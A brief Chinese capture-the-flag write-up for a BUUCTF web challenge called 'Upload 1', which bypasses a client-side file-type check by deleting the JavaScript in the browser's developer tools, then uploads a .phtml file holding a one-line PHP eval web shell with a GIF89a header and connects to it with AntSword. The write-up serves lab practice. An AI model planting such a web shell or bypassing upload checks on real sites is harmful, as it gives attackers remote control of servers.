buuctf-web 新生赛]Upload 1

启动环境，打开靶机

既然，题目都叫Upload，那肯定是要上传文件的嘛。

然后我们先写一个phtml文件

GIF89a
<script language="php">eval($_POST['shell']);</script> 

然后上传，

 

 出错，发现不允许上传phtml文件

猜测这应该是前端js验证，那我们需要将它绕过。

先来一手f12，

 

 那我们就将它删除。

 

然后再一次上传。

 

 ok成功。

最后我们使用蚁剑，连接一手。

 

 测试连接后添加，flag就成根目录下